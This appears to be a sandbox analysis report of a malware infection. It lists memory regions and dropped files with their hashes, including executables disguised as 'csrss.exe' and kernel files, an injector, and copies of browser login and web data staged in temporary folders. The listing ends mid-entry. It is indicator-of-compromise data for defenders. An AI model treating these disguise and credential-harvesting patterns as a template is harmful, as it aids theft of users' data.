memory/2292-955-0x0000000076DB0000-0x0000000076F59000-memory.dmp

memory/2292-954-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp

memory/2292-953-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/1208-956-0x0000000002FA0000-0x0000000002FB6000-memory.dmp

C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe

MD5 8901f25ebcf2ff0db1a32825aff4c69f
SHA1 f0d5f1f70dffcfc99ce35cdd0a5a10193765ceeb
SHA256 642825309e79f1eb9962a9e15dcc43d122f16790d0a91b627001f5236b234721
SHA512 4a3533e917d241f693c360f6288a72fa9ce3f917ba14965adb88baefbc380c05aa97f6ac781bd40bdbbaae67e876abfc91b518f0d6115a11751ad07a701a29d3

memory/2032-957-0x0000000000400000-0x0000000002D35000-memory.dmp

C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe

MD5 c2ef805490108de7287cfc176d42476e
SHA1 557e0dbe1661579496d900e0efd90e1660c5c485
SHA256 57cc3426fb9d1dfff31b3074f85f1d7b1625a4e29af0590ad05ef0bbdfbd31ed
SHA512 3b319d8cea8b2b0d9ddb8561afce61f4c255fc25a5613ba77b9462cc27d556b5fa6ddee5409461ca51fefbb28021f58c5b9dfe471c1343a8be4e1ee053aeeb15

memory/708-966-0x00000000066D0000-0x00000000069AC000-memory.dmp

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

MD5 50f83c5a0e15f5030b758024da774685
SHA1 715427ee4c537bc16c770bbc1b8ba92368de7d28
SHA256 841a3640c2c8a68809763bfa074330e3e991bd0fb803e1e18b9f80128bdc3519
SHA512 213044e261aad0a5c01617a30b5377499694ac7519119a1942c5c6835e11fa3a3a2a87c0b3bb0343cb289762e51609d10fb3a77ff83028045b61233414dc827e

memory/452-995-0x0000000004A90000-0x0000000004E88000-memory.dmp

memory/1940-996-0x0000000000400000-0x0000000003118000-memory.dmp

memory/1940-997-0x0000000004B20000-0x0000000004F18000-memory.dmp

memory/1744-1000-0x000000006E480000-0x000000006EA2B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d14c451344e5a1d715a747b384466894
SHA1 b959d8f9b0210826cbafe3f7a431680e818a51d4
SHA256 e8ac6ab24d8c4f4770f82c4e3328c99a9f6013a4048ba15bed68ffa42e063519
SHA512 3d58a358c01cabbee9581409c89a18322d0b894b6a863957e0e195cf06add80c05189ee86ed639074e3f04ca07166e8032d4ee07a8eb0b85fefc1d83fd744e1c

memory/2220-1018-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1536-1029-0x0000000000D40000-0x0000000001AC3000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

\Windows\rss\csrss.exe

MD5 55a87651d3c0d209b72a185858107636
SHA1 b7b1e85c9be7db398888b9e60f853b83d493b31e
SHA256 270641bf5acce59ff39d9c75f06f8c9dbc0bd1ce81b6268fcae518ecc70b0e19
SHA512 703745e4b0c374fbed52d7e26fec90de7fcbf2a0892b9e916b2e9208c58100cedd8e9f0912c14fc08bc6f841593750cad30aa90a28057413445f7b3858568e5f

\Windows\rss\csrss.exe

MD5 111592899d04c8439a8b116841fa1af5
SHA1 843d8ff565cc72a4b24271dbe7b815502930776e
SHA256 c92c4737f3e32827e12ba6ae412a339868ba76f7da00de7ddf0f5e48e19b6735
SHA512 853d47b3fbddbb1f7fa08822765e7ab1a7e86db795a9b6db18138c8bd9317fccd36e1463fd4db504ae92feb1a1cd33050bea31b976c6aa4bac26295b6ef58674

C:\Windows\rss\csrss.exe

MD5 388b9f1ae46a681a3d5076f3292ab3f8
SHA1 7c6cef8c58e3cadf648e55e646f591283899adc3
SHA256 fba80de3f16a7dab80c6fba110634f71fce046ad2b73e1fe1a98d64ca652c368
SHA512 1903bc31dd4e48af8eb3318f47a2f904aaa5c13a91d389eeafa3bc8bcfad52cd84479f4e53fc9c3bb7330c7b4dfee03ff1bf5eab5ea806b319f27ad8ea052d0f

memory/452-1071-0x0000000004A90000-0x0000000004E88000-memory.dmp

memory/452-1072-0x0000000000400000-0x0000000003118000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 b4ce1d7f83a59c1c7caa5fa6459a8e3b
SHA1 90f0287b63d63e8eeca9d045a9369cc955c2d9fc
SHA256 88d2f8953de4adec36e5d83a7bbe36fbb43afb43c50a0341dae4239a10c8aa1d
SHA512 9a9d358e0eadfe2d7391d8d228c58906485732acba9671356174ca07a5260221bac0b4ba4bfb708c3fcce8a34b5e886f4e51f096fa99f13100479749871e4c5e

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 bdc08885fc53a990ea29f5167c1f5a8b
SHA1 b26b70961805617551473f1303566aedbd75bdf3
SHA256 8aa27f72fa142a8f4a106c64fc4d933d9260f5831a3e8f2cbd1d39bd2c510928
SHA512 64780d666e699c36c79c5014c0f6ff8db293e5de1058a5d192eece94e626fc500b1cecb6d9e097b394e04cfe41c66537aa6767b5acc1aad9092791375039584b

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 e8f48a38f2870850759a80d8670440c1
SHA1 bd66ab9816a739f220f10511be2df49c2bf499bd
SHA256 590516d897c29fb1ac56dbe5f991af1b6ea1c1869dd12a7186257ee667983435
SHA512 34a03f70e7cd79bc54e32f7cd8d84d02816f2ebe127ade4767eb1d368e525d620d6982cdf8d58a1d8eaf6354da74b14b527fd4c2f56951b6da7edd934831a30a

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 d0fab78e5be946230bc6344be5fb2d12
SHA1 db8d38be9964fae896674cec3c72f20e69ca9947
SHA256 ae818952a5abf42f76c0ee4c504e90b8b01d8c9a00d7ae0b1425ee34a64ff6b9
SHA512 38a69333c5bc12a06059226d40a0cf30f3c7d8f6576dd2b7069d431a6b03e3aa3d3b8122483d318dd43d7fabf80756bdb156bc7a2702f843e663c7f3b2022bde

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0b5f899f2ca2ab3030784fe09201d882
SHA1 23083f00b60c4507f1818723d6dcb5fa9d7e9dfc
SHA256 f7596721e2175e4aab68914b2993d7c0cb97f8869a50931ba4455ef27f4fe089
SHA512 cfb93cba7f045bfdb72761fa956f68062cfaac315e562787018f33626c88477a0d4e4985f6bccdc9241e5b413ce316afeaf218214d1702e93f7aae1eb20976af

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 b41e025dafce740f4a5e794649d0b618
SHA1 c60e12e51466224add9121c0826c394d5d7e86f0
SHA256 6bbc1621f5bf9f145b3b34ffbfa6b042047f90138dbbfc535e7d56da6381bb73
SHA512 ae9615f391bc32fc2c08ec52949e6dc1045dc5c49c3f2281dfff2eee3879470d52a1c101d9183b324ab346127685b8f997ed70ea0404c05ba86827bce3f9b92d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 f92c3fbf541b4d6314079039f989043d
SHA1 db897607f04adcf6dbbee29c1aa2326bcbbbef56
SHA256 61b4489f283ea8ed4bd4d13c52213ca4558afef5653e8e8a423fc96220fb7239
SHA512 aee43b48492078ce9370af53f84aa55720b5303650bb2fac549798db8ac9e7e628dc08246b7998c93a62f197d7151a94a5126f512c30b3f8d6e9595fb96328d7

\??\pipe\crashpad_1660_XKTEQPKBCSTPWMQW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d12b774d871a68121699a755b0213a85
SHA1 a8dc77401604b25abd1584e01f0c1a85dee8ed57
SHA256 7212d6856ef2c6c76002a6d8d912492d92d952b15a444cb1b6c37c5a8ebf4e3c
SHA512 9092a27197a28392114100c284882dbb3b00e42448460f0b245fb61ff5b6a0edd8bb7929b4aa007dd5dcd8e086651cb01f424f45105b4de643a48c2374954095

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\icons\button16_gray.png

MD5 063639790f82803cbabd87c1000419de
SHA1 def21db4dc72a4757190596e8abda4cdb19d5b27
SHA256 566950ec154716221f26c60e5381d4059d795c619fc775c442d8b3db5da89e5f
SHA512 b847e68b4d8aff592adf1ce9e5ed6435ad769f034b09c05f1f08b10de910a33f7175c95172d289c37280d618e871d7eb3d62f0aad9235a6498197e682489c5ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\icons\button16.png

MD5 88796de39efca78e02e56dc1bfc6952a
SHA1 d079a15866fc1b674b41cc7cb82e45f098b35c43
SHA256 effdea56479505371c47eec59fe23280e039a5aeaa2a481b5407d3c36723338f
SHA512 8a888047f62069780cc8b0e76ed93cd83476796adf097493a28e8b48902476b3d97e5dbc301d20cf9a691df73c7ec611f0f39a27a3a9c20e1091940c7f4bdd6a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\content-script.js

MD5 fc473ab01e941ae72f65b02160f87ef4
SHA1 26bb53953a6e60d5ebc4a58bb811a3ffac5335f8
SHA256 ddf4f9a5a4ec06a6473287e83de5dbb19d5d4370a72ca0c2dfbbee3775c1fbf8
SHA512 148f1568995b455c5eb2685bb05cf719c031e358863cc7e359f73f4114db934d3b615212cae8abc41c710a40f917597af15fff1672fd0e0955a0b03ab1424653

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\_metadata\verified_contents.json

MD5 f7f0462b05d4eea341c565ccd96a8b63
SHA1 15ed215063cfec11b5ab937258ebe2617295e651
SHA256 40a0de2bcceb97b08a8804ffd7d348dac07e15bce3d042fe2c7a315ea656f73f
SHA512 bd905485f5963c737ef26ac05118e4a32a85365cbfc05d7cb465644e321a3930e0458a8e5801e7572cc3456fbcf836750db7dc6a088ff2f4fb4d1a08be551abe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT~RFf76c3db.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eciaojnpihmgkbacgpjnimcpkfeklgag\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 fd17e12e33af88ada75312d7a40e0dfd
SHA1 ad721ed218f551ea6225dfa03142bf56f48d7083
SHA256 2e2ba51bc4b372790b3c89641e016ba2976685bc7eae6678c7b582a991611a5a
SHA512 763f3b302c4de32101b9e9f16bca286c7a308109cd51cfa089221f17a6de1db8c3d4a2221506a0d103bf8700a2dcd5fb47e976334426bad4353909cbc38558f9

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\D87fZN3R3jFeWeb Data

MD5 18e04095708297d6889a6962f81e8d8f
SHA1 9a25645db1da0217092c06579599b04982192124
SHA256 4ed16c019fe50bb4ab1c9dcedf0e52f93454b5dbaf18615d60761e7927b69fb7
SHA512 45ec57bddeeb8bca05babcf8da83bf9db630819b23076a1cf79f2e54b3e88e14cd7db650332554026ab5e8634061dd699f322bcba6683765063e67ac47ea1caf

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\8ghN89CsjOW1Login Data For Account

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\3b6N2Xdh3CYwplaces.sqlite

MD5 5abefffbcfcb833e098dff88ca9c2cf2
SHA1 00c13b1547bf540e7106742f45e6d55f01e8dcf0
SHA256 679c618e9cb42323cd0be32e9a9a55649e1700efa0a862a0d4a05b78e4dffdb6
SHA512 3404324afa33be247f6b402703ce2f45af174e6faaff2aaa35b6b01b77b5fcc68454acc61399bc197fa4e3942e0d044f7ecaaa73aa7403d1bc2fea04bdad201a

C:\Users\Admin\AppData\Local\Temp\adobe_K9P2oRtBlnq\information.txt

MD5 cf04337e11f83710bc8466692919e38f
SHA1 b73931770c927b7c5d907252e6aaf1905fede0e5
SHA256 b146f7c043ab96694608b826d4efe41f1cbadae647a156538c146fe32de7b5da
SHA512 19ac53b91f2a5ca68cb80ea1ef6c4be516f29558f1d4646f71f4a77144e8c181d038cc26e38c22874a4f7e67befd6156d0162d651ce6d523a44d75b3e89f4f71

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe

MD5 3d2fd432d83034d3f60f4353943ba959
SHA1 aaa51821a12eec15e704c4a1827ae3cdc401ad92
SHA256 7ee27efcbf77620cb30881e9360937d55e4d76e5963d94f898d818a1cac5ae06
SHA512 a1b923df19ef86ce6d961b1b41222bbb54aee18a2c2ccb61c7a617091f1a4ba51b3fef46315455ec89c0ded917adb18f76f1815d53fb7a766434f7660e81ac1a

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe

MD5 ccba907ff137d72e46c20fa3d523c777
SHA1 fbef73ed53f836d4a6f3619b7033237c9a88bebb
SHA256 3cf41c34268b626c913a0db4317871eac685cfac493d3b7a641315d67bb5acf4
SHA512 037df2c6628026451df2e20346c8009b1a1ff77bb3e915b509c86b94d3e70dd6a8bf98607acba1c123abb99e36781eafadc1b7f6d7e82830c7f7ffd2558a7e19

memory/708-1350-0x00000000737C0000-0x0000000073EAE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 747ef608e6ecc1ea01054099357c5993
SHA1 daa0d8b324afd5e7c33ce9dc72006f5247d63281
SHA256 4f0cf780e5037f6ad8a3ba213315302501203dca03f8ab28f56c67dbc8b40ed9
SHA512 858b757b7032181012cd9a945e53d1274a68b01d2f260a64616b355ec9cf7bc13ce1a629be4e952d42a6e44f48ffcacbc6a3a2ca0ddd9c4e4d042a744f43c7ef

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b8c4d6e9733c38f34eb72ce17bc8236
SHA1 4904f60367d53607c6938aa4b2042fb06a5f718f
SHA256 9e8588c5897282c21c172b23b717b3f2bb705d24552d167cc9dffa2615a839ea
SHA512 e7f42bc47bdc1e3b8bfd4dcbf2516e2ec1da56ab3eaa3b7de9b99a21d7377c8f1719fb69ef4a668dd93d025cdcbb0483debbfa3f451a10c5df0935e8b5f6cff5

memory/1872-1431-0x0000000000990000-0x0000000000991000-memory.dmp

memory/2220-1436-0x0000000002F25000-0x0000000002F3D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2BF.exe

MD5 b12a32d3450c2cd7aae7f9af384b4cac
SHA1 973641854c881465136f275283c9642f8bad62d5
SHA256 388ef1a3c7b241d0583503e836918a2a316d8e4a733fed3ab39c838d73cf91b4
SHA512 fc6510b724f6af1994c3ef8549dd178a2e986c816a88d4ee6f7ff0d2bb94e3f3b144e547994635a764b43f0127e8bb11dbcd00d26aad6d12a6378626bc2f77c3

memory/2220-1448-0x0000000000400000-0x0000000002D38000-memory.dmp

memory/1872-1454-0x0000000000CD0000-0x000000000126B000-memory.dmp

memory/3684-1463-0x00000000046F0000-0x00000000048A8000-memory.dmp

memory/3684-1465-0x00000000048B0000-0x0000000004A67000-memory.dmp

memory/1872-1464-0x0000000002A60000-0x0000000002A61000-memory.dmp

memory/1872-1475-0x0000000002BE0000-0x0000000002BE1000-memory.dmp

memory/1872-1480-0x00000000026C0000-0x00000000026C1000-memory.dmp

memory/1872-1485-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

memory/1872-1484-0x0000000002C00000-0x0000000002C02000-memory.dmp

memory/1872-1481-0x0000000000980000-0x0000000000982000-memory.dmp

memory/1872-1479-0x0000000002B90000-0x0000000002B91000-memory.dmp

memory/1872-1478-0x0000000002A80000-0x0000000002A81000-memory.dmp

memory/1872-1474-0x0000000002910000-0x0000000002911000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 63e438954d654f3546d0f463cd305b6d
SHA1 76cc4b7b51d42ef38201b9cfd88629cbe6447579
SHA256 2b620be240c3c5f0a3fa8762352975392be2a83f3e08e63a55ad41775cb0bade
SHA512 b92dc9ae54097bde1d2162ffdf2c129c0ab778293e72a07429a3220af224244d9db65dda20ab8a1c0e534e9d478c30b41d2004fbbbb651e9617ac787b6ef41b8

memory/2324-1576-0x000007FEF2640000-0x000007FEF2FDD000-memory.dmp

memory/2324-1577-0x0000000002F20000-0x0000000002FA0000-memory.dmp

memory/2788-1579-0x0000000004CB0000-0x00000000050A8000-memory.dmp

memory/1828-1578-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2352-1580-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CY2G78MW\3m4lyvbs6efg8pyhv7kupo6dh[1].ico

MD5 3d0e5c05903cec0bc8e3fe0cda552745
SHA1 1b513503c65572f0787a14cc71018bd34f11b661
SHA256 42a498dc5f62d81801f8e753fc9a50af5bc1aabda8ab8b2960dce48211d7c023
SHA512 3d95663ac130116961f53cdca380ffc34e4814c52f801df59629ec999db79661b1d1f8b2e35d90f1a5f68ce22cc07e03f8069bd6e593c7614f7a8b0b0c09fa9e

memory/2788-1595-0x0000000000400000-0x0000000003118000-memory.dmp

memory/1384-1596-0x0000000000550000-0x0000000000B38000-memory.dmp

memory/1384-1597-0x0000000000760000-0x0000000000D48000-memory.dmp

memory/1872-1598-0x00000000026D0000-0x00000000026D1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6ef95c0c-c5eb-477e-a91d-9cde8a286652.tmp

MD5 296ec7e1734c2f224204c949ccd335d2
SHA1 3294e35c80af3c892767512cbaa7736460c28952
SHA256 d8c4c69cfb9e4cd0b2878dc2a48cc72d54cf73e8f64a4d3c0ad66a109a6abe0f
SHA512 80ac4f585371bfee01f81673b5d40d6be19fb2264449222aef2dad6a2c72ffd02824492851cd81c0fdde44d03edc4c150c8800ad7b70eed5e2855f6f7ef56e15

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 7b7b64e21cc3c8295ade9914b4140ded
SHA1 6a96c39af69268d25c60aeeedb15d1e100de6119
SHA256 1afa729189008fae921e27e07cf92b2d87b22558e93684141092ec98c3a62c90
SHA512 2890019a01665020f9c28a799d0a2f7bd35c0798120598bbdb01d4bf63a4a323abb04d576cb46436d8fe491b719c2e4ae574ac0d74be2f43a07b0d32dcc36e55

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe

MD5 9167418153667b5984b64729e2cc304c
SHA1 af391e07bdd8592a06fa13077f2fdeb6a564bdc0
SHA256 b59d22ae79f79061d50ee7461c9e146bb4df6a048ec9deebd267944237206961
SHA512 1909ff300fbb006fdedf87729791909d75225ef68a62fd5dcb8a0d525b8102cedd4ec86a8b268aaf10e577e6d525928539b1668acb2758d8d0a93f16480e76f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_520FA7AD0A5B7A5300910F5BBDCB6D0C

MD5 512484c864f03d942b375be914f0e87a
SHA1 22d5f6f2a2f75c2824ebe531bb4469820f4e412f
SHA256 7007095b23b512a2d22c0c3464521d4c04a216bb1adfd2d710d1b1325e44563e
SHA512 fbd34a47c65ed8781073c404dac037be619fc057e8fd9c41d5fe2173241188ceef6d3fb1422406ffa0665dd33f2465cc5ea7bd9f6d61f2974df452dca9bf2a11

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\O4ZUVKGE\accounts.google[1].xml

MD5 c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA1 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966
SHA256 b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
SHA512 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30BCF8D79B1225AC4F40686E58D30D95

MD5 3a9e9078c23e745b6b3adeda8bf007d6
SHA1 73efef6de1ae81ad90f1f313aec7a51b6a793d99
SHA256 a5719da1dcac5ffae8d52cbeb79fa95e4da62746c111eeb833250a5e04a6f328
SHA512 a52b200ca23fc077b9870b03aadb0845012a0206a8243b00d040e1f407941a3952b0671b31c97e5f733c9a19df2b79f733235d9d48b35382e6e06414fa6d4c72

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30BCF8D79B1225AC4F40686E58D30D95

MD5 f40ed113228750cfd7a589e9d717c518
SHA1 14a57aadde10d2d7d8ca590a6c1fb04886897693
SHA256 94615d8606f3e16679d03700a02ced8b7ea8c2b453da9b7bea855cbe229d395a
SHA512 a20e48dd8b432da446be22a6f675574fab2f321ce11690fe75312795a62dd832c4652633d8547c6eee1743687f706ba0a464f56239c09882c8af171fd3869bbd

C:\Users\Admin\AppData\Local\Temp\Kno226F.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\jw2rl61\imagestore.dat

MD5 04ea2732aeca95131a59c207c8426617
SHA1 facee4d396551c97c1fb53925902f8d7a97a283a
SHA256 c99d2ddd041314957c575a9be8fb544b1bb821e0222dbd2728488a1d52cec31f
SHA512 6bab4e91326ce9a1eb1e26dcf675553c74d2b1de0fd953148c4fb330e72a24ce63bd99aab2fa9000052beab28d6f8bbbb641970514668e2ac9da3b8f59d68cc1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RSAB58HZ\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 b3ac3cbe864fd6a9b834580173b47cd5
SHA1 9efaf52ea87825877a4e9cf4bf6e0f75436f8632
SHA256 42948b3d788a51acbfc4b588027b2ad4e97f150f772c576fc99f51b852a6b476
SHA512 4a8ea2d1ea425227765600438db8485a484ffd6781b636c67662babe0d709f67e1b6cf7c576e749e188646338769ec9adb3ddf96ff5282021adf9a2c412cdd3c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\4Kv5U5b1o3f[1].png

MD5 a81a5e7f71ae4153e6f888f1c92e5e11
